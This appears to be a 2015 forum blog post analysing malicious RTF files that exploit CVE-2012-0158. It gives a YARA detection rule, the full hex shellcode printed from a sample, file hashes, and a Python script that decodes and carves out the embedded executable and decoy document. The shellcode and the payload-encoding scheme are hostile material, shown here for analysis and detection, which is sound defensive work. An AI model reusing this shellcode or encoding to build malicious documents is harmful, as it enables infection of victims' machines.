View RSS Feed

w@rri0r@bh@y

Apt vitnam

Rating: 3 votes, 2.00 average.
Greet :- "vinnu","nightrover","bond"

I used the name "VITNAM" because the decoy file had some contents from Vietnam. Here i have automated a process through which we can extract an Executable from rtf exploit.

Yara Rule:
Code:
rule APT_VITNAM {
  meta:
   author = "w@rri0r@bh@y"
  strings :
   $magic = "{\\rt"
   $v0 = "eb00eb1490905e33c980368746"
   $v1 = "1816685e99e2"
   $v2 = "\xD4\x39\x09\x63"
  condition :
   ($magic at 0) and (3 of ($v*))
}
Extractor For Shellcode:
Code:
"eb00eb1490905e33c9803687464181f9000200007408ebf1e8e9ffffff17d2b44ee30cb2b78787870cf18b0cf19b0cd98f0ce98f0cf9a70cb1e1bec89ff2750c5a6e88868787da0c7aed89de6f3e878787657e400207868787878787870a3a07868787048083ed87ed87ef4bca878778b078d2a3ba4bca8787f265ed870a0217868787d7ed830c42820f868787d778b078d2ab063a0f868787d6d5d4d3f239edc7ef87978787ef87978787ed8778d2af0e020f868787ed870a0217868787d76c8c1717171717171717171717ef878187870c020f868787d70c0207868787d778d2ab0c1a0f868787b44e6c8c171717171717171717171707b38c64c6067e87818787f27478220f868787d6d20cf4bb0cf399ff8474d10cf1a78474b44ecec62a8444b46a883997bd51f38f464a80846dc76c76bca8f260d90ce9a3846ce10ccbca870ce99b846c0cc30a8784442cdade44171717176f6b797878b5f3168bbe65fa04d6a8258627e2104ce40e56c809948d2b14b56313d0e18a78430a98f3c4392b5ce0de599935b188943efbf2ee1c000c62abb4858787878787f9c2dfc4c2cb87872d1f1f335183a599d00d6ca5b620c1edb0d9a5668562d36a0e9fb9edc3e12e18a5629300bca6bd13772af0ed6962e06ee3689d2bdf9cd465c5d5245ed5aca566f08ff5e545912e6686acaded4d62e44686acad360ea88165c0e1f5edc4f5a6238db92e2795b92e2791b92e279db92e2b61627cedc0112e9dae102e523d6c538770a8a6138d01816685e99e2444444444444"
This shellcode was used in exploit cve-2012-0158
Sample used :
SHA256: c072e309c087e496a8a72eb47eba9ce6d5708a6738dd1311eb 3921f0f98fa461
Md5: 0b95c9d37e430a0b7b176b71fb65fc1a

I have written an automated script which can process lots of samples which have the same shellcode..
To use create a folder named "scan" and put the sample in it. scan folder and script should be in same directory.

Extractor:
Code:
import os, shutil,binascii

scan = os.getcwd() + "\\scan\\"
processed_file = os.getcwd() + "\\comp\\"
nocomp = os.getcwd() + "\\nocomp\\"
MZ = os.getcwd() + "\\MZ\\"

try:
 os.mkdir(processed_file)
 os.mkdir(nocomp)
 os.mkdir(MZ)
except:
 pass
 
samples = os.listdir(scan)

def ror(byte, count):
    return (byte >> count | byte << (8- count)) & 0xFF
 
def decode_vit(file_decrypt,file_size):
 complete_file = ""
 a = 0
 for i in range(0,file_size-1,2):
  complete_file += chr(ror(ord(file_decrypt[a]),4))
  complete_file += chr(ord(file_decrypt[a+1]) ^ 0x63)
  a = a+2
 return complete_file

def mov_nocomp():
 try:
     shutil.move(os.path.join(scan,sample),os.path.join(nocomp,sample))
 except:
       pass

def mov_processed_file():
 try:
     shutil.move(os.path.join(scan,sample),os.path.join(processed_file,sample))
 except:
       pass

for sample in samples:
  file = open(scan+sample,"rb")
  fl = file.read()
  file.close()
  if fl[:4] == "{\\rt":
   found = fl.find("\xD4\x39\x09\x63")
   print found
   file_decrypt = ""
   if found > -1:
    file_decrypt = fl[found:]
    file_size = len(file_decrypt)
    print file_size
    complete_file = decode_vit(file_decrypt,file_size)
    MZ_File = complete_file.find("MZ")
    data = binascii.unhexlify('D0CF11')
    doc_file = complete_file.find(data)
    MZ_extraction = open(MZ+sample+".exe_","wb")
    MZ_extraction.write(complete_file[MZ_File:doc_file])
    MZ_extraction.close()
    doc_Extraction = open(MZ+sample+".doc","wb")
    doc_Extraction.write(complete_file[doc_file:])
    doc_Extraction.close()
    mov_processed_file()
   else:
    mov_nocomp()
  else:
   mov_nocomp()

Updated 03-20-2015 at 02:35 PM by [s]

Tags: None Add / Edit Tags
Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: